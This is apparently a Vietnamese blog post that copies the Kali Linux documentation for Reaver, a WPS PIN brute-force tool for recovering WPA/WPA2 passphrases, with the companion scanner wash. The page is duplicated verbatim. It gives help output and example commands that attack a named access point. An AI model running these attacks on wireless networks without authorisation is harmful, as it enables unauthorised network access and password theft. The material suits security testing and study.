Reaver
Mô tả gói Reaver
Reaver thực hiện một cuộc tấn công vét cạn (brute force) nhắm vào tính năng Wifi Protected Setup (WPS) nắm giữ mã PIN để thu hồi WPA / WPA2 passphrase, như mô tả trong http://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf.
Reaver đã được thiết kế để có thể thực hiện một cuộc tấn công mạnh mẽ và thiết thực đối nhằm WPS, và đã được thử nghiệm đối với một loạt các điểm truy cập hỗ trợ tính năng WPS.
Tính trung bình Reaver sẽ khôi phục lại bản rõ WPA / WPA2 passphrase của AP trong khoảng từ 4-10 giờ, tùy thuộc vào các AP. Trong thực tế, nói chung nó sẽ mất một nửa thời gian này để đoán mã pin WPS chính xác và phục hồi các cụm từ mật khẩu
Nguồn: https://code.google.com/p/reaver-wps/
Reaver trang chủ | Kali Reaver Repo
Tác giả: Tactical Network Solutions, Craig Heffner
Giấy phép: GPLv2
Công cụ bao gồm trong gói reaver
Reaver - Công cụ tấn công WiFi Protected Setup
root@kali:~# reaver -h
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
Required Arguments:
-i, --interface=<wlan> Name of the monitor-mode interface to use
-b, --bssid=<mac> BSSID of the target AP
Optional Arguments:
-m, --mac=<mac> MAC of the host system
-e, --essid=<ssid> ESSID of the target AP
-c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)
-o, --out-file=<file> Send output to a log file [stdout]
-s, --session=<file> Restore a previous session file
-C, --exec=<command> Execute the supplied command upon successful pin recovery
-D, --daemonize Daemonize reaver
-a, --auto Auto detect the best advanced options for the target AP
-f, --fixed Disable channel hopping
-5, --5ghz Use 5GHz 802.11 channels
-v, --verbose Display non-critical warnings (-vv for more)
-q, --quiet Only display critical messages
-h, --help Show help
Advanced Options:
-p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin
-d, --delay=<seconds> Set the delay between pin attempts [1]
-l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
-g, --max-attempts=<num> Quit after num pin attempts
-x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
-r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts
-t, --timeout=<seconds> Set the receive timeout period [5]
-T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]
-A, --no-associate Do not associate with the AP (association must be done by another application)
-N, --no-nacks Do not send NACK messages when out of order packets are received
-S, --dh-small Use small DH keys to improve crack speed
-L, --ignore-locks Ignore locked state reported by the target AP
-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet
-n, --nack Target AP always sends a NACK [Auto]
-w, --win7 Mimic a Windows 7 registrar [False]
Example:
reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv
wash – Công cụ quét xác định WiFi Protected Setup
root@kali:~# wash -h
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
Required Arguments:
-i, --interface=<iface> Interface to capture packets on
-f, --file [FILE1 FILE2 FILE3 ...] Read packets from capture files
Optional Arguments:
-c, --channel=<num> Channel to listen on [auto]
-o, --out-file=<file> Write data to file
-n, --probes=<num> Maximum number of probes to send to each AP in scan mode [15]
-D, --daemonize Daemonize wash
-C, --ignore-fcs Ignore frame checksum errors
-5, --5ghz Use 5GHz 802.11 channels
-s, --scan Use scan mode
-u, --survey Use survey mode [default]
-h, --help Show help
Example:
wash -i mon0
Ví dụ cách dùng wash
Quét cho các mạng sử dụng giao diện chế độ màn hình (-i mon0) trên kênh 6 (-c 6), trong khi bỏ qua lỗi khung checksum (C):
root@kali:~# wash -i mon0 -c 6 -C
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
BSSID Channel RSSI WPS Version WPS Locked ESSID
---------------------------------------------------------------------------------------------------------------
E0:3F:49:6A:57:78 6 -73 1.0 No ASUS
Ví dụ cách sử dụng Reaver
Sử dụng giao diện chế độ màn hình (-i mon0) để tấn công các điểm truy cập (-b E0: 3F: 49: 6A: 57: 78), hiển thị đầu ra dài (v):
root@kali:~# reaver -i mon0 -b E0:3F:49:6A:57:78 -v
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from E0:3F:49:6A:57:78
[+] Associated with E0:3F:49:6A:57:78 (ESSID: ASUS)
[+] Trying pin 12345670
http://tools.kali.org/wireless-attacks/reaver
Reaver thực hiện một cuộc tấn công vét cạn (brute force) nhắm vào tính năng Wifi Protected Setup (WPS) nắm giữ mã PIN để thu hồi WPA / WPA2 passphrase, như mô tả trong http://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf.
Reaver đã được thiết kế để có thể thực hiện một cuộc tấn công mạnh mẽ và thiết thực đối nhằm WPS, và đã được thử nghiệm đối với một loạt các điểm truy cập hỗ trợ tính năng WPS.
Tính trung bình Reaver sẽ khôi phục lại bản rõ WPA / WPA2 passphrase của AP trong khoảng từ 4-10 giờ, tùy thuộc vào các AP. Trong thực tế, nói chung nó sẽ mất một nửa thời gian này để đoán mã pin WPS chính xác và phục hồi các cụm từ mật khẩu
Nguồn: https://code.google.com/p/reaver-wps/
Reaver trang chủ | Kali Reaver Repo
Tác giả: Tactical Network Solutions, Craig Heffner
Giấy phép: GPLv2
Công cụ bao gồm trong gói reaver
Reaver - Công cụ tấn công WiFi Protected Setup
root@kali:~# reaver -h
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
Required Arguments:
-i, --interface=<wlan> Name of the monitor-mode interface to use
-b, --bssid=<mac> BSSID of the target AP
Optional Arguments:
-m, --mac=<mac> MAC of the host system
-e, --essid=<ssid> ESSID of the target AP
-c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)
-o, --out-file=<file> Send output to a log file [stdout]
-s, --session=<file> Restore a previous session file
-C, --exec=<command> Execute the supplied command upon successful pin recovery
-D, --daemonize Daemonize reaver
-a, --auto Auto detect the best advanced options for the target AP
-f, --fixed Disable channel hopping
-5, --5ghz Use 5GHz 802.11 channels
-v, --verbose Display non-critical warnings (-vv for more)
-q, --quiet Only display critical messages
-h, --help Show help
Advanced Options:
-p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin
-d, --delay=<seconds> Set the delay between pin attempts [1]
-l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
-g, --max-attempts=<num> Quit after num pin attempts
-x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
-r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts
-t, --timeout=<seconds> Set the receive timeout period [5]
-T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]
-A, --no-associate Do not associate with the AP (association must be done by another application)
-N, --no-nacks Do not send NACK messages when out of order packets are received
-S, --dh-small Use small DH keys to improve crack speed
-L, --ignore-locks Ignore locked state reported by the target AP
-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet
-n, --nack Target AP always sends a NACK [Auto]
-w, --win7 Mimic a Windows 7 registrar [False]
Example:
reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv
wash – Công cụ quét xác định WiFi Protected Setup
root@kali:~# wash -h
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
Required Arguments:
-i, --interface=<iface> Interface to capture packets on
-f, --file [FILE1 FILE2 FILE3 ...] Read packets from capture files
Optional Arguments:
-c, --channel=<num> Channel to listen on [auto]
-o, --out-file=<file> Write data to file
-n, --probes=<num> Maximum number of probes to send to each AP in scan mode [15]
-D, --daemonize Daemonize wash
-C, --ignore-fcs Ignore frame checksum errors
-5, --5ghz Use 5GHz 802.11 channels
-s, --scan Use scan mode
-u, --survey Use survey mode [default]
-h, --help Show help
Example:
wash -i mon0
Ví dụ cách dùng wash
Quét cho các mạng sử dụng giao diện chế độ màn hình (-i mon0) trên kênh 6 (-c 6), trong khi bỏ qua lỗi khung checksum (C):
root@kali:~# wash -i mon0 -c 6 -C
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
BSSID Channel RSSI WPS Version WPS Locked ESSID
---------------------------------------------------------------------------------------------------------------
E0:3F:49:6A:57:78 6 -73 1.0 No ASUS
Ví dụ cách sử dụng Reaver
Sử dụng giao diện chế độ màn hình (-i mon0) để tấn công các điểm truy cập (-b E0: 3F: 49: 6A: 57: 78), hiển thị đầu ra dài (v):
root@kali:~# reaver -i mon0 -b E0:3F:49:6A:57:78 -v
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from E0:3F:49:6A:57:78
[+] Associated with E0:3F:49:6A:57:78 (ESSID: ASUS)
[+] Trying pin 12345670
http://tools.kali.org/wireless-attacks/reaver
Comments
Post a Comment